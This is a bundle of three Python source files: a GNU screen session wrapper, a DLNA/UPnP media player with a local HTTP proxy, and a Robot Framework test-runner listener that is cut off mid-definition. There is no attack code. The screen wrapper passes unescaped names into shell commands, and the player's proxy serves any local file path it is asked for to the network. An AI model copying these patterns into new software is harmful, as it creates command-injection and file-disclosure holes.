| source | python |
|---|---|
screen.py
|
# This file is modified from the screenutils Python module
# https://pypi.org/project/screenutils/
# https://github.com/Christophe31/screenutils
# -*- coding:utf-8 -*-
#
# This program is free software. It comes without any warranty, to
# the extent permitted by applicable law. You can redistribute it
# and/or modify it under the terms of the GNU Public License 2 or upper.
# Please ask if you wish a more permissive license.
try:
from commands import getoutput
except Exception:
from subprocess import getoutput
from os import system
from time import sleep
class ScreenNotFoundError(Exception):
"""Raised when the screen does not exists."""
def __init__(self, message, screen_name):
message += " Screen \"{0}\" not found".format(screen_name)
self.screen_name = screen_name
super(ScreenNotFoundError, self).__init__(message)
def list_screens():
"""List all the existing screens and build a Screen instance for each."""
list_cmd = "screen -ls"
return [
Screen(".".join(l.split(".")[1:]).split("\t")[0])
for l in getoutput(list_cmd).split('\n')
if "\t" in l and ".".join(l.split(".")[1:]).split("\t")[0]
]
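# For illustration (assuming a typical GNU screen install), a `screen -ls`
# line looks like "\t28062.myscreen\t(Detached)"; the comprehension above
# keeps everything after the first dot and before the first tab, i.e. the
# session name "myscreen".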
class Screen(object):
"""Represents a gnu-screen object.
>>> s=Screen("screenName", initialize=True)
>>> s.name
'screenName'
>>> s.exists
True
>>> s.state
>>> s.send_commands("man -k keyboard")
>>> s.kill()
>>> s.exists
False
"""
def __init__(self, name, initialize=False):
self.name = name
self._id = None
self._status = None
if initialize:
self.initialize()
@property
def id(self):
"""Return the identifier of the screen as string."""
if not self._id:
self._set_screen_infos()
return self._id
@property
def status(self):
"""Return the status of the screen as string."""
self._set_screen_infos()
return self._status
@property
def exists(self):
"""Tell if the screen session exists or not."""
# Parse the screen -ls call, to find if the screen exists or not.
# " 28062.G.Terminal (Detached)"
lines = getoutput("screen -ls").split('\n')
return self.name in [
".".join(l.split(".")[1:]).split("\t")[0]
for l in lines
if self.name in l
]
def initialize(self):
"""Initialize a screen, if does not exists yet."""
if not self.exists:
self._id = None
# Detach the screen once attached, on a new thread.
# support Unicode (-U),
# attach to a new/existing named screen (-R).
# ORIGINAL
# Thread(target=self._delayed_detach).start()
# system('screen -s sh -UR -S ' + self.name)
# CUSTOM
system('screen -d -m -S ' + self.name)
def interrupt(self):
"""Insert CTRL+C in the screen session."""
self._screen_commands("eval \"stuff \\003\"")
def kill(self):
"""Kill the screen applications then close the screen."""
self._screen_commands('quit')
def detach(self):
"""Detach the screen."""
self._check_exists()
system("screen -d " + self.id)
def send_commands(self, *commands):
"""Send commands to the active gnu-screen."""
self._check_exists()
for command in commands:
# use single quote unless that is a part of the command
if "'" in command:
q = "\""
else:
q = "\'"
self._screen_commands(
'stuff {q}{c}{q}'.format(q=q, c=command),
'eval "stuff \\015"'
)
def add_user_access(self, unix_user_name):
"""Allow to share your session with an other unix user."""
self._screen_commands('multiuser on', 'acladd ' + unix_user_name)
def _screen_commands(self, *commands):
"""Allow to insert generic screen specific commands."""
self._check_exists()
for command in commands:
cmd = 'screen -x {0}.{1} -p 0 -X {2}'.format(self.id, self.name, command)
system(cmd)
sleep(0.02)
def _check_exists(self, message="Error code: 404."):
"""Check whereas the screen exist. if not, raise an exception."""
if not self.exists:
raise ScreenNotFoundError(message, self.name)
def _set_screen_infos(self):
"""Set the screen information related parameters."""
if self.exists:
line = ""
for l in getoutput("screen -ls").split("\n"):
if (
l.startswith('\t') and
self.name in l and
self.name == ".".join(l.split('\t')[1].split('.')[1:]) in l
):
line = l
if not line:
raise ScreenNotFoundError("While getting info.", self.name)
infos = line.split('\t')[1:]
self._id = infos[0].split('.')[0]
if len(infos) == 3:
self._date = infos[1][1:-1]
self._status = infos[2][1:-1]
else:
self._status = infos[1][1:-1]
def _delayed_detach(self):
sleep(0.5)
self.detach()
def __repr__(self):
return "<%s '%s'>" % (self.__class__.__name__, self.name)
|
dlnap.py
|
#!/usr/bin/python
# @file dlnap.py
# @author cherezov.pavel@gmail.com
# @brief Python network media player for playback on DLNA/UPnP devices.
# Change log:
# 0.1 initial version.
# 0.2 device renamed to DlnapDevice; DLNAPlayer removed.
# 0.3 debug output is added. Extract location url fixed.
# 0.4 compatible discover mode added.
# 0.5 xml parser introduced for device descriptions
# 0.6 xpath introduced to navigate over xml dictionary
# 0.7 device ip argument introduced
# 0.8 debug output is replaced with standard logging
# 0.9 pause/stop added. Video playback tested on Samsung TV
# 0.10 proxy (draft) is introduced.
# 0.11 sync proxy for py2 and py3 implemented, --proxy-port added
# 0.12 local files can be played as well now via proxy
# 0.13 ssdp protocol version argument added
# 0.14 fixed bug with receiving responses from device
#
# 1.0 moved from idea version
__version__ = "0.14"
import logging
import mimetypes
import os
import re
import select
import shutil
import socket
import sys
import threading
import time
import traceback
from contextlib import contextmanager
from http.server import BaseHTTPRequestHandler
from http.server import HTTPServer
from urllib.request import Request
from urllib.request import urlopen
import xmltodict
SSDP_GROUP = ("239.255.255.250", 1900)
URN_AVTransport = "urn:schemas-upnp-org:service:AVTransport:1"
URN_AVTransport_Fmt = "urn:schemas-upnp-org:service:AVTransport:{}"
URN_RenderingControl = "urn:schemas-upnp-org:service:RenderingControl:1"
# URN_RenderingControl_Fmt = "urn:schemas-upnp-org:service:RenderingControl:{}"
SSDP_ALL = "ssdp:all"
# =================================================================================================
# PROXY
#
running = False
class DownloadProxy(BaseHTTPRequestHandler):
def log_message(self, format, *args):
pass
def log_request(self, code='-', size='-'):
pass
def response_success(self):
url = self.path[1:] # replace '/'
if os.path.exists(url):
f = open(url)
content_type = mimetypes.guess_type(url)[0]
else:
f = urlopen(url=url)
content_type = f.getheader("Content-Type")
self.send_response(200, "ok")
self.send_header('Access-Control-Allow-Origin', '*')
self.send_header('Access-Control-Allow-Methods', 'GET, OPTIONS')
self.send_header("Access-Control-Allow-Headers", "X-Requested-With")
self.send_header("Access-Control-Allow-Headers", "Content-Type")
self.send_header("Content-Type", content_type)
self.end_headers()
def do_OPTIONS(self):
self.response_success()
def do_HEAD(self):
self.response_success()
def do_GET(self):
global running
url = self.path[1:] # replace '/'
content_type = ''
if os.path.exists(url):
f = open(url, 'rb')  # binary mode: the body is later copied to self.wfile as bytes
content_type = mimetypes.guess_type(url)[0]
size = os.path.getsize(url)
elif not url or not url.startswith('http'):
self.response_success()
return
else:
f = urlopen(url=url)
try:
if not content_type:
content_type = f.getheader("Content-Type")
size = f.getheader("Content-Length")
self.send_response(200)
self.send_header('Access-Control-Allow-Origin', '*')
self.send_header("Content-Type", content_type)
self.send_header("Content-Disposition",
'attachment; filename="{}"'.format(os.path.basename(url)))
self.send_header("Content-Length", str(size))
self.end_headers()
shutil.copyfileobj(f, self.wfile)
finally:
running = False
f.close()
def runProxy(ip='', port=8000):
global running
running = True
DownloadProxy.protocol_version = "HTTP/1.0"
httpd = HTTPServer((ip, port), DownloadProxy)
while running:
httpd.handle_request()
#
# PROXY
# =================================================================================================
def _get_port(location):
""" Extract port number from url.
location -- string like http://anyurl:port/whatever/path
return -- port number
"""
port = re.findall(r'http://.*?:(\d+).*', location)
return int(port[0]) if port else 80
def _get_control_urls(xml):
""" Extract AVTransport contol url from device description xml
xml -- device description xml
return -- control url or empty string if wasn't found
"""
try:
return {i['serviceType']: i['controlURL'] for i in
xml['root']['device']['serviceList']['service']}
except:
return
@contextmanager
def _send_udp(to, packet):
""" Send UDP message to group
to -- (host, port) group to send the packet to
packet -- message to send
"""
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP)
sock.sendto(packet.encode(), to)
yield sock
sock.close()
def _unescape_xml(xml):
""" Replace escaped xml symbols with real ones.
"""
return xml.decode().replace('&lt;', '<').replace('&gt;', '>').replace('&quot;', '"')
def _get_location_url(raw):
""" Extract device description url from discovery response
raw -- raw discovery response
return -- location url string
"""
t = re.findall(r'\nlocation:\s*(.*)\r\s*', raw, re.M | re.I)
if len(t) > 0:
return t[0]
return ''
def _get_friendly_name(xml):
""" Extract device name from description xml
xml -- device description xml
return -- device name
"""
try:
return xml['root']['device']['friendlyName']
except Exception as e:
return 'Unknown'
class DlnapDevice:
""" Represents DLNA/UPnP device.
"""
def __init__(self, raw, ip):
self.__logger = logging.getLogger(self.__class__.__name__)
self.__logger.info('=> New DlnapDevice (ip = {}) initialization..'.format(ip))
self.ip = ip
self.ssdp_version = 1
self.port = None
self.name = 'Unknown'
self.control_url = None
self.rendering_control_url = None
self.has_av_transport = False
try:
self.__raw = raw.decode()
self.location = _get_location_url(self.__raw)
self.__logger.info('location: {}'.format(self.location))
self.port = _get_port(self.location)
self.__logger.info('port: {}'.format(self.port))
raw_desc_xml = urlopen(self.location, timeout=5).read().decode()
desc_dict = xmltodict.parse(raw_desc_xml)
self.__logger.debug('description xml: {}'.format(desc_dict))
self.name = _get_friendly_name(desc_dict)
self.__logger.info('friendlyName: {}'.format(self.name))
services_url = _get_control_urls(desc_dict)
self.control_url = services_url[URN_AVTransport]
self.__logger.info('control_url: {}'.format(self.control_url))
self.rendering_control_url = services_url[URN_RenderingControl]
self.__logger.info('rendering_control_url: {}'.format(self.rendering_control_url))
self.has_av_transport = self.control_url is not None
self.__logger.info('=> Initialization completed')
except Exception as e:
self.__logger.warning(
'DlnapDevice (ip = {}) init exception:\n{}'.format(ip, traceback.format_exc()))
def __repr__(self):
return '{} @ {}'.format(self.name, self.ip)
def __eq__(self, d):
return self.name == d.name and self.ip == d.ip
@staticmethod
def _payload_from_template(action, data, urn):
""" Assembly payload from template.
"""
fields = ''
for tag, value in data.items():
fields += '<{tag}>{value}</{tag}>'.format(tag=tag, value=value)
payload = """<?xml version="1.0" encoding="utf-8"?>
<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
<s:Body>
<u:{action} xmlns:u="{urn}">
{fields}
</u:{action}>
</s:Body>
</s:Envelope>""".format(action=action, urn=urn, fields=fields)
return payload
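# For illustration, _payload_from_template('Play', {'InstanceID': 0, 'Speed': 1},
# URN_AVTransport) produces a SOAP envelope whose body contains
#   <u:Play xmlns:u="urn:schemas-upnp-org:service:AVTransport:1">
#   <InstanceID>0</InstanceID><Speed>1</Speed>
#   </u:Play>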
def _soap_request(self, action, data):
""" Send SOAP Request to DMR devices
action -- control action
data -- dictionary with XML fields value
"""
if not self.control_url:
return None
if action in ["SetVolume", "SetMute", "GetVolume"]:
url = self.rendering_control_url
# urn = URN_RenderingControl_Fmt.format(self.ssdp_version)
urn = URN_RenderingControl
else:
url = self.control_url
urn = URN_AVTransport_Fmt.format(self.ssdp_version)
soap_url = 'http://{}:{}{}'.format(self.ip, self.port, url)
headers = {'Content-type': 'text/xml',
'SOAPACTION': '"{}#{}"'.format(urn, action),
'charset': 'utf-8',
'User-Agent': '{}/{}'.format(__file__, __version__)}
self.__logger.debug(headers)
payload = self._payload_from_template(action=action, data=data, urn=urn)
self.__logger.debug(payload)
try:
req = Request(soap_url, data=payload.encode(), headers=headers)
res = urlopen(req, timeout=5)
if res.code == 200:
data = res.read()
self.__logger.debug(data.decode())
# response = xmltodict.parse(data)
response = xmltodict.parse(_unescape_xml(data))
try:
error_description = \
response['s:Envelope']['s:Body']['s:Fault']['detail']['UPnPError'][
'errorDescription']
logging.error(error_description)
return None
except:
return response
except Exception as e:
logging.error(e)
def set_current_media(self, url, instance_id=0):
""" Set media to playback.
url -- media url
instance_id -- device instance id
"""
response = self._soap_request('SetAVTransportURI',
{'InstanceID': instance_id, 'CurrentURI': url,
'CurrentURIMetaData': ''})
try:
response['s:Envelope']['s:Body']['u:SetAVTransportURIResponse']
return True
except:
# Unexpected response
return False
def play(self, instance_id=0, speed=1):
""" Play media that was already set as current.
instance_id -- device instance id
"""
response = self._soap_request('Play', {'InstanceID': instance_id, 'Speed': speed})
try:
response['s:Envelope']['s:Body']['u:PlayResponse']
return True
except:
# Unexpected response
return False
def pause(self, instance_id=0):
""" Pause media that is currently playing back.
instance_id -- device instance id
"""
response = self._soap_request('Pause', {'InstanceID': instance_id, 'Speed': 1})
try:
response['s:Envelope']['s:Body']['u:PauseResponse']
return True
except:
# Unexpected response
return False
def stop(self, instance_id=0):
""" Stop media that is currently playing back.
instance_id -- device instance id
"""
response = self._soap_request('Stop', {'InstanceID': instance_id, 'Speed': 1})
try:
response['s:Envelope']['s:Body']['u:StopResponse']
return True
except:
# Unexpected response
return False
def seek(self, position, instance_id=0):
"""
Seek position
"""
response = self._soap_request('Seek', {'InstanceID': instance_id, 'Unit': 'REL_TIME',
'Target': position})
try:
response['s:Envelope']['s:Body']['u:SeekResponse']
return True
except:
# Unexpected response
return False
def volume(self, volume=10, instance_id=0):
""" Stop media that is currently playing back.
instance_id -- device instance id
"""
response = self._soap_request('SetVolume',
{'InstanceID': instance_id, 'DesiredVolume': volume,
'Channel': 'Master'})
try:
response['s:Envelope']['s:Body']['u:SetVolumeResponse']
return True
except:
# Unexpected response
return False
def get_volume(self, instance_id=0):
"""
Get the current playback volume.
"""
response = self._soap_request('GetVolume', {'InstanceID': instance_id, 'Channel': 'Master'})
if response:
return response['s:Envelope']['s:Body']['u:GetVolumeResponse']['CurrentVolume']
def mute(self, instance_id=0):
""" Stop media that is currently playing back.
instance_id -- device instance id
"""
response = self._soap_request('SetMute', {'InstanceID': instance_id, 'DesiredMute': '1',
'Channel': 'Master'})
try:
response['s:Envelope']['s:Body']['u:SetMuteResponse']
return True
except:
# Unexpected response
return False
def unmute(self, instance_id=0):
""" Stop media that is currently playing back.
instance_id -- device instance id
"""
response = self._soap_request('SetMute', {'InstanceID': instance_id, 'DesiredMute': '0',
'Channel': 'Master'})
try:
response['s:Envelope']['s:Body']['u:SetMuteResponse']
return True
except:
# Unexpected response
return False
def info(self, instance_id=0):
""" Transport info.
instance_id -- device instance id
"""
response = self._soap_request('GetTransportInfo', {'InstanceID': instance_id})
if response:
return dict(response['s:Envelope']['s:Body']['u:GetTransportInfoResponse'])
def media_info(self, instance_id=0):
""" Media info.
instance_id -- device instance id
"""
response = self._soap_request('GetMediaInfo', {'InstanceID': instance_id})
if response:
return dict(response['s:Envelope']['s:Body']['u:GetMediaInfoResponse'])
def position_info(self, instance_id=0):
""" Position info.
instance_id -- device instance id
"""
response = self._soap_request('GetPositionInfo', {'InstanceID': instance_id})
if response:
return dict(response['s:Envelope']['s:Body']['u:GetPositionInfoResponse'])
def set_next(self, url, instance_id=0):
""" Set next media to playback.
url -- media url
instance_id -- device instance id
"""
response = self._soap_request('SetNextAVTransportURI',
{'InstanceID': instance_id, 'NextURI': url,
'NextURIMetaData': ''})
try:
response['s:Envelope']['s:Body']['u:SetNextAVTransportURIResponse']
return True
except:
# Unexpected response
return False
def next(self, instance_id=0):
""" Play media that was already set as next.
instance_id -- device instance id
"""
response = self._soap_request('Next', {'InstanceID': instance_id})
try:
response['s:Envelope']['s:Body']['u:NextResponse']
return True
except:
# Unexpected response
return False
def discover(name='', ip='', timeout=1, st=SSDP_ALL, mx=3, ssdp_version=1):
""" Discover UPnP devices in the local network.
name -- name or part of the name to filter devices
ip -- ip address of a known device to filter by
timeout -- timeout to perform discover
st -- st field of discovery packet
mx -- mx field of discovery packet
ssdp_version -- ssdp protocol version
return -- list of DlnapDevice
"""
st = st.format(ssdp_version)
payload = "\r\n".join([
'M-SEARCH * HTTP/1.1',
'User-Agent: {}/{}'.format(__file__, __version__),
'HOST: {}:{}'.format(*SSDP_GROUP),
'Accept: */*',
'MAN: "ssdp:discover"',
'ST: {}'.format(st),
'MX: {}'.format(mx),
'',
''])
devices = []
with _send_udp(SSDP_GROUP, payload) as sock:
start = time.time()
while True:
if time.time() - start > timeout:
# timed out
break
r, w, x = select.select([sock], [], [sock], 1)
if sock in r:
data, addr = sock.recvfrom(1024)
if ip and addr[0] != ip:
continue
d = DlnapDevice(data, addr[0])
d.ssdp_version = ssdp_version
if d not in devices:
if not name or name is None or name.lower() in d.name.lower():
if not ip:
devices.append(d)
elif d.has_av_transport:
# no need in further searching by ip
devices.append(d)
break
elif sock in x:
raise Exception('Getting response failed')
else:
# Nothing to read
pass
return devices
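# Programmatic usage (illustrative sketch; the media URL is hypothetical):
#
#   devices = discover(timeout=3, st=URN_AVTransport_Fmt)
#   tv = next(d for d in devices if d.has_av_transport)
#   tv.set_current_media('http://example.com/video.mp4')
#   tv.play()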
if __name__ == '__main__':
import getopt
def usage():
print(
'{} [--ip <device ip>] [-d[evice] <name>] [--all] [-t[imeout] <seconds>] [--play <url>] [--pause] [--stop] [--proxy]'.format(
__file__))
print(' --ip <device ip> - ip address for faster access to the known device')
print(
' --device <device name or part of the name> - discover devices with this name as substring')
print(
' --all - flag to discover all upnp devices, not only devices with AVTransport ability')
print(
' --play <url> - set current url for playback and start playing it. If url is empty, continue playing the recent media.')
print(' --pause - pause current playback')
print(' --stop - stop current playback')
print(' --mute - mute playback')
print(' --unmute - unmute playback')
print(' --volume <vol> - set current volume for playback')
print(' --seek <position in HH:MM:SS> - set current position for playback')
print(' --timeout <seconds> - discover timeout')
print(' --ssdp-version <version> - discover devices by protocol version, default 1')
print(' --proxy - use local proxy on proxy port')
print(
' --proxy-port <port number> - proxy port to listen for incoming connections from devices, default 8000')
print(' --help - this help')
def version():
print(__version__)
try:
opts, args = getopt.getopt(sys.argv[1:], "hvd:t:i:", [ # information arguments
'help',
'version',
'log=',
# device arguments
'device=',
'ip=',
# action arguments
'play=',
'pause',
'stop',
'volume=',
'mute',
'unmute',
'seek=',
# discover arguments
'list',
'all',
'timeout=',
'ssdp-version=',
# transport info
'info',
'media-info',
# download proxy
'proxy',
'proxy-port='])
except getopt.GetoptError:
usage()
sys.exit(1)
device = ''
url = ''
vol = 10
position = '00:00:00'
timeout = 1
action = ''
logLevel = logging.WARN
compatibleOnly = True
ip = ''
proxy = False
proxy_port = 8000
ssdp_version = 1
for opt, arg in opts:
if opt in ('-h', '--help'):
usage()
sys.exit(0)
elif opt in ('-v', '--version'):
version()
sys.exit(0)
elif opt in ('--log'):
if arg.lower() == 'debug':
logLevel = logging.DEBUG
elif arg.lower() == 'info':
logLevel = logging.INFO
elif arg.lower() == 'warn':
logLevel = logging.WARN
elif opt in ('--all'):
compatibleOnly = False
elif opt in ('-d', '--device'):
device = arg
elif opt in ('-t', '--timeout'):
timeout = float(arg)
elif opt in ('--ssdp-version'):
ssdp_version = int(arg)
elif opt in ('-i', '--ip'):
ip = arg
compatibleOnly = False
timeout = 10
elif opt in ('--list'):
action = 'list'
elif opt in ('--play'):
action = 'play'
url = arg
elif opt in ('--pause'):
action = 'pause'
elif opt in ('--stop'):
action = 'stop'
elif opt in ('--volume'):
action = 'volume'
vol = arg
elif opt in ('--seek'):
action = 'seek'
position = arg
elif opt in ('--mute'):
action = 'mute'
elif opt in ('--unmute'):
action = 'unmute'
elif opt in ('--info'):
action = 'info'
elif opt in ('--media-info'):
action = 'media-info'
elif opt in ('--proxy'):
proxy = True
elif opt in ('--proxy-port'):
proxy_port = int(arg)
logging.basicConfig(level=logLevel)
st = URN_AVTransport_Fmt if compatibleOnly else SSDP_ALL
allDevices = discover(name=device, ip=ip, timeout=timeout, st=st, ssdp_version=ssdp_version)
if not allDevices:
print('No compatible devices found.')
sys.exit(1)
if action in ('', 'list'):
print('Discovered devices:')
for d in allDevices:
print(' {} {}'.format('[a]' if d.has_av_transport else '[x]', d))
sys.exit(0)
d = allDevices[0]
print(d)
if url.lower().replace('https://', '').replace('www.', '').startswith('youtube.'):
import subprocess
process = subprocess.Popen(['youtube-dl', '-g', url], stdout=subprocess.PIPE)
url, err = process.communicate()
# communicate() returns bytes under python3; decode before comparing strings
url = url.decode().strip()
if url.lower().startswith('https://'):
proxy = True
if proxy:
ip = socket.gethostbyname(socket.gethostname())
t = threading.Thread(target=runProxy, kwargs={'ip': ip, 'port': proxy_port})
t.start()
time.sleep(2)
if action == 'play':
try:
d.stop()
url = 'http://{}:{}/{}'.format(ip, proxy_port, url) if proxy else url
d.set_current_media(url=url)
d.play()
except Exception as e:
print('Device is unable to play media.')
logging.warning('Play exception:\n{}'.format(traceback.format_exc()))
sys.exit(1)
elif action == 'pause':
d.pause()
elif action == 'stop':
d.stop()
elif action == 'volume':
d.volume(vol)
elif action == 'seek':
d.seek(position)
elif action == 'mute':
d.mute()
elif action == 'unmute':
d.unmute()
elif action == 'info':
print(d.info())
elif action == 'media-info':
print(d.media_info())
if proxy:
t.join()
|
TestRunnerAgent.py
|
#!/usr/bin/env python
# ----------------------------------------------------------------------------
# Copyright 2010 Orbitz WorldWide
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Modified by Mikko Korpela under NSN copyrights
# Copyright 2008-2015 Nokia Solutions and Networks
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Amended by Timothy Alexander <dragonfyre13@gmail.com>
# (StreamHandler class added)
# Copyright 2013 Timothy Alexander
# Licensed under the Apache License, Version 2.0
# http://www.apache.org/licenses/LICENSE-2.0
#
# Modified by Mateusz Marzec under NSN copyrights
# Copyright 2015 Nokia Solutions and Networks
# * Licensed under the Apache License, Version 2.0,
# * see license.txt file for details.
#
# Amended by Helio Guilherme <helioxentric@gmail.com>
# Copyright 2008-2015 Nokia Networks
# Copyright 2016- Robot Framework Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""A Robot Framework listener that sends information to a socket
This uses the custom StreamHandler class defined below, preferring json but
falling back to pickle, to send objects to the listening server. It should probably be
refactored to call an XMLRPC server.
"""
import copy
import os
import platform
import sys
import socket
import threading
PLATFORM = platform.python_implementation()
PY2 = sys.version_info[0] == 2
PY3 = not PY2
try:
import SocketServer
except ImportError: #py3
try:
import socketserver as SocketServer
except ImportError as e:
raise e
try:
# to find robot (we use provided lib)
sys.path.append(os.path.join(os.path.dirname(__file__), '../../lib'))
from robot.errors import ExecutionFailed
from robot.running import EXECUTION_CONTEXTS
from robot.running.signalhandler import STOP_SIGNAL_MONITOR
from robot.utils import encoding
from robot.utils.encoding import SYSTEM_ENCODING
except ImportError:
encoding = None
# print("TestRunnerAgent: Maybe you did not installed RIDE under this Python?") # DEBUG
raise # DEBUG
# print("DEBUG: console %s system %s" % (encoding.CONSOLE_ENCODING, encoding.SYSTEM_ENCODING))
if sys.hexversion > 0x2060000:
import json
_JSONAVAIL = True
else:
try:
import simplejson as json
_JSONAVAIL = True
except ImportError:
_JSONAVAIL = False
try:
import cPickle as pickle
except ImportError: # py3
import pickle as pickle
try:
from cStringIO import StringIO
except ImportError:
try:
from StringIO import StringIO
except ImportError: # py3
from io import StringIO
HOST = "localhost"
# Setting Output encoding to UTF-8 and ignoring the platform specs
# RIDE will expect UTF-8
# Set output encoding to UTF-8 for piped output streams
# DEBUG This was working in Linux always!
#if encoding:
# encoding.OUTPUT_ENCODING = 'UTF-8'
# print("DEBUG: TestRunnerAgent encoding %s\n" % SYSTEM_ENCODING )
def _is_logged(level):
current = EXECUTION_CONTEXTS.current
if current is None:
return True
out = current.output
if out is None:
return True
return out._xmllogger._log_message_is_logged(level)
class TestRunnerAgent:
"""Pass all listener events to a remote listener
If called with one argument, that argument is a port.
If called with two, the first is the port and the second ('True'/'False')
turns pause-on-failure debugging on or off.
"""
ROBOT_LISTENER_API_VERSION = 2
def __init__(self, *args):
self.port = int(args[0])
self.host = HOST
self.sock = None
self.filehandler = None
self.streamhandler = None
self._connect()
self._send_pid()
self._create_debugger((len(args) >= 2) and (args[1] == 'True'))
self._create_kill_server()
print("TestRunnerAgent: Running under %s %s\n" %
(PLATFORM, sys.version.split()[0]))
def _create_debugger(self, pause_on_failure):
self._debugger = RobotDebugger(pause_on_failure)
def _create_kill_server(self):
self._killer = RobotKillerServer(self._debugger)
self._server_thread = threading.Thread(
target=self._killer.serve_forever)
self._server_thread.setDaemon(True)
self._server_thread.start()
self._send_server_port(self._killer.server_address[1])
def _send_pid(self):
self._send_socket("pid", os.getpid())
def _send_server_port(self, port):
self._send_socket("port", port)
def start_test(self, name, attrs):
self._send_socket("start_test", name, attrs)
def end_test(self, name, attrs):
self._send_socket("end_test", name, attrs)
def start_suite(self, name, attrs):
attrs_copy = copy.copy(attrs)
del attrs_copy['doc']
attrs_copy['is_dir'] = os.path.isdir(attrs['source'])
self._send_socket("start_suite", name, attrs_copy)
def end_suite(self, name, attrs):
attrs_copy = copy.copy(attrs)
del attrs_copy['doc']
attrs_copy['is_dir'] = os.path.isdir(attrs['source'])
self._send_socket("end_suite", name, attrs_copy)
def start_keyword(self, name, attrs):
# pass empty args, see https://github.com/nokia/RED/issues/32
# we're cutting args from original attrs dict, because it may contain
# objects which are not json-serializable and we don't need them anyway
attrs_copy = copy.copy(attrs)
del attrs_copy['args']
del attrs_copy['doc']
del attrs_copy['assign']
self._send_socket("start_keyword", name, attrs_copy)
if self._debugger.is_breakpoint(name, attrs): # must check original
self._debugger.pause()
paused = self._debugger.is_paused()
if paused:
self._send_socket('paused')
self._debugger.start_keyword()
if paused:
self._send_socket('continue')
def end_keyword(self, name, attrs):
# pass empty args, see https://github.com/nokia/RED/issues/32
attrs_copy = copy.copy(attrs)
del attrs_copy['args']
del attrs_copy['doc']
del attrs_copy['assign']
self._send_socket("end_keyword", name, attrs_copy)
self._debugger.end_keyword(attrs['status'] == 'PASS')
def message(self, message):
pass
def log_message(self, message):
if _is_logged(message['level']):
self._send_socket("log_message", message)
def log_file(self, path):
self._send_socket("log_file", path)
def output_file(self, path):
pass
def report_file(self, path):
self._send_socket("report_file", path)
def summary_file(self, path):
pass
def debug_file(self, path):
pass
def close(self):
self._send_socket("close")
if self.sock:
self.filehandler.close()
self.sock.close()
def _connect(self):
"""Establish a connection for sending data"""
try:
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.sock.connect((self.host, self.port))
# Iron python does not return right object type if not binary mode
self.filehandler = self.sock.makefile('wb')
self.streamhandler = StreamHandler(self.filehandler)
except socket.error as e:
print('unable to open socket to "%s:%s" error: %s'
% (self.host, self.port, str(e)))
self.sock = None
self.filehandler = None
def _send_socket(self, name, *args):
try:
if self.filehandler:
packet = (name, args)
self.streamhandler.dump(packet)
self.filehandler.flush()
except Exception:
import traceback
traceback.print_exc(file=sys.stdout)
sys.stdout.flush()
raise
class RobotDebugger(object):
def __init__(self, pause_on_failure=False):
self._state = 'running'
self._keyword_level = 0
self._pause_when_on_level = -1
self._pause_on_failure = pause_on_failure
self._resume = threading.Event()
@staticmethod
def is_breakpoint(name, attrs):
if len(attrs['args']) > 0:
return name == 'BuiltIn.Comment' and \
str(attrs['args'][0]).upper().startswith(u"PAUSE")
def pause(self):
self._resume.clear()
self._state = 'pause'
def pause_on_failure(self, pause):
self._pause_on_failure = pause
def resume(self):
self._state = 'running'
self._pause_when_on_level = -1
self._resume.set()
def step_next(self):
self._state = 'step_next'
self._resume.set()
def step_over(self):
self._state = 'step_over'
self._resume.set()
def start_keyword(self):
while self._state == 'pause':
self._resume.wait()
self._resume.clear()
if self._state == 'step_next':
self._state = 'pause'
elif self._state == 'step_over':
self._pause_when_on_level = self._keyword_level
self._state = 'resume'
self._keyword_level += 1
def end_keyword(self, passed=True):
self._keyword_level -= 1
if self._keyword_level == self._pause_when_on_level or\
(self._pause_on_failure and not passed):
self._state = 'pause'
def is_paused(self):
return self._state == 'pause'
class RobotKillerServer(SocketServer.TCPServer):
allow_reuse_address = True
def __init__(self, debugger):
SocketServer.TCPServer.__init__(self, ("", 0), RobotKillerHandler)
self.debugger = debugger
class RobotKillerHandler(SocketServer.StreamRequestHandler):
def handle(self):
data = self.request.makefile('r').read().strip()
if data == 'kill':
self._signal_kill()
elif data == 'pause':
self.server.debugger.pause()
elif data == 'resume':
self.server.debugger.resume()
elif data == 'step_next':
self.server.debugger.step_next()
elif data == 'step_over':
self.server.debugger.step_over()
elif data == 'pause_on_failure':
self.server.debugger.pause_on_failure(True)
elif data == 'do_not_pause_on_failure':
self.server.debugger.pause_on_failure(False)
@staticmethod
def _signal_kill():
try:
STOP_SIGNAL_MONITOR(1, '')
except ExecutionFailed:
pass
# NOTE: Moved to bottom of TestRunnerAgent per feedback in pull request,
# so jybot doesn't encounter issues. Special imports at top of file.
class StreamError(Exception):
"""
Base class for EncodeError and DecodeError
"""
pass
class EncodeError(StreamError):
"""
This exception is raised when an unencodable object is passed to the
dump() method or function.
"""
wrapped_exceptions = (pickle.PicklingError, )
class DecodeError(StreamError):
"""
This exception is raised when there is a problem decoding an object,
such as a security violation.
Note that other exceptions may also be raised during decoding, including
AttributeError, EOFError, ImportError, and IndexError.
"""
# NOTE: No JSONDecodeError in json in stdlib for python >= 2.6
wrapped_exceptions = (pickle.UnpicklingError,)
if _JSONAVAIL:
if hasattr(json, 'JSONDecodeError'):
wrapped_exceptions = (pickle.UnpicklingError, json.JSONDecodeError)
def dump(obj, fp):
StreamHandler(fp).dump(obj)
def load(fp):
return StreamHandler(fp).load()
def dumps(obj):
